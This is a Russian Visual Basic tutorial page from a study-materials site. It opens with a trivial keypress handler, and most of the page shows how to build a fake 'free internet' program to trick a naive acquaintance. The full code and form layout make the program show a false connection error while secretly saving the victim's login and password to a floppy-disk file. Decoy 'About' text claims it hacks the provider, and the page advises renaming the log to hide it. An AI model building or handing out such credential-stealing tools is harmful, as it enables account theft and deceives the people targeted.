Студопедия

Главная страница Случайная страница

Разделы сайта

АвтомобилиАстрономияБиологияГеографияДом и садДругие языкиДругоеИнформатикаИсторияКультураЛитератураЛогикаМатематикаМедицинаМеталлургияМеханикаОбразованиеОхрана трудаПедагогикаПолитикаПравоПсихологияРелигияРиторикаСоциологияСпортСтроительствоТехнологияТуризмФизикаФилософияФинансыХимияЧерчениеЭкологияЭкономикаЭлектроника






Клавиатура на visual basic






Как я и обещал в первой части, что мы будем работать с клавой. Для этого нам понадобится программа, которую мы делали в первой части в 7 шаге. Эта программа переводит числа в код Аски и обратно, если у тебя ее нет, то скачай ее от сюда. Хей, Стоп не нажимай туда, обойдемся и без нее. Теперь входим в VB, у форме событие Event делаем KeyDown(если нажата клавиша):

 

Теперь пишем код:

Private Sub Form_KeyDown(KeyCode As Integer, Shift As Integer) If KeyCode = Asc(" Z") Then MsgBox " Ты нажал на Z" End IfEnd Sub

Ну на этом я закончу тебя грузить, можешь переходить к следующей. В ней будем делать приколы, работать с файлами и папками, сделаем PinBall, Блокнот, и Internet Explorer 7....

 

Развод ламеров. Халявный инет на Visual Basic

Вся радость в том, что ламер будет думать что он дурит провайдера, а на самом деле будут дурить его. Хе - Хе. Ламер сам напишет тебе пароль, и скинет тебе его на дискету. Ты дашь ему программу, и скажешь, что эта программа нужна для того чтоб в инете на халяву сидеть. Он спросит: “ а у тебя получилось", ты ему скажешь: " Да, конешно работает, а если не работала, то я тебе ее не дал бы"... Ну для большей убедительности расскажешь ему о ней (речь сам придумаешь). Он впишет свой пароль и логин, и комп сохранит их на дискету. Учитывается то, что ламер будет вводить в начале не свой пароль, но это неважно, когда - нибуть он свой введет, и все его записи сохранятся на дискете, потом ты придешь домой, проверишь все его записи, и по какой - нибуть войдешь.
Ну что начнем? На форму кидаем 2 кнопки, 2 текстовых поля, 3 метки, ну и сделаем меню для большей убедительности. У первой кнопки свойство Caption будет Ввод, у второй Выход; у текстовых полей убираем свойство Text; у первой метки свойство Caption будет Password, у второй Login, а у 3 Халявный Интернет; у меню сделаем 2 раздела, первый раздел по традиции свойство Caption будет файл, а у второго Справка. У первого раздела первого подраздела свойство Caption будет выход, а у второго раздела, первого подраздела свойство Caption будет Вызов справки, а у второго подраздела О программе. Да чуть не забыл, нам надо добавить еще одну форму, для этого нажми на Add Form, эта фенька находится около кнопки создание меню, под разделом Edit. Короче у тебя должна получиться такая штука:

 

Private Sub Command1_Click() 'При нажатии на кнопку Ввод: MsgBox " Не установлено соединение или неправильно введен пароль", 48, " Ошибка при соединение" 'Появится ошибка, с сообщением о неправильных действиях ламера, если ламер введет не правильный (или правильный) пароль и логин, то появится ошибка, и когда - нибуть он введет правильный... d = FreeFileOpen " a: 1.txt" For Append As d 'Открываем файл для записи, в него будут записываться данные ламера. Стоит диск a:, это для того чтоб привязать программу к дискете, и тогда ламер не сможет скинуть ее себе на комп, и когда он отдаст тебе дискету, ты прочтешь все его записи. Print #d, Text1.Text; Tab; Text2.Text 'Записываем данные, которые ламер введет в текстовые поля Close #d 'Закрываем файл End Sub Private Sub Command2_Click() 'При нажатии на кнопку 2: End 'Выходим из программы, можно и с помощью Unload Me End SubPrivate Sub ав_Click() End 'При выборе Файл/Выход программа отрубается: End Sub Private Sub см_Click() 'При нажатии на кнопку 3(О программе): Form2.Show 'Показываем Form2 End Sub

Теперь займемся оформлением Формы 2.На форму 2 закинем 4 метки: У первой свойство Caption будет О программе. У второй будет: " Программа ломает твоего провайдера, через порт TCP/IP; за каждый заход тебе на карту зачисляется 0.25 y.e., это оптимальная сумма для всех карт. Например, у MTU можно снять за раз 0.27 y.e., а у ROL 0.33 y.e., это зависит от скорости обновления сервера. После нажатия на Ввод появится сообщение о успешном взломе, и в течение 3 минут постарайтесь выйти из интернета. Где - то через 10 - 15 мин. опять можете повторять операцию.". У третьей: " Автор проекта не несет ни какой ответственности за использование программы", и эту метку надо сделать красным цветом. У четвертой: " Дата создания: 10/07/02".У пятой: " Автор: Падре". Все это нужно для большей убедительности. У тебя должна получиться такая фенька.

 

Ну вот и все!!! Теперь подсунь ее какому - нибуть ламеру. Не забудь скрыть текстовой файл, можешь поменять ему расширения, например записать не 1.txt, 1.lamer, и тогда ламер не додумается его открыть, даже если его найдет. А ты сможешь открыть его, если кликнешь на него два раза, и в открывшимся окне " Открыть с помощью", выбери Noterpad(Блокнот)

 






© 2023 :: MyLektsii.ru :: Мои Лекции
Все материалы представленные на сайте исключительно с целью ознакомления читателями и не преследуют коммерческих целей или нарушение авторских прав.
Копирование текстов разрешено только с указанием индексируемой ссылки на источник.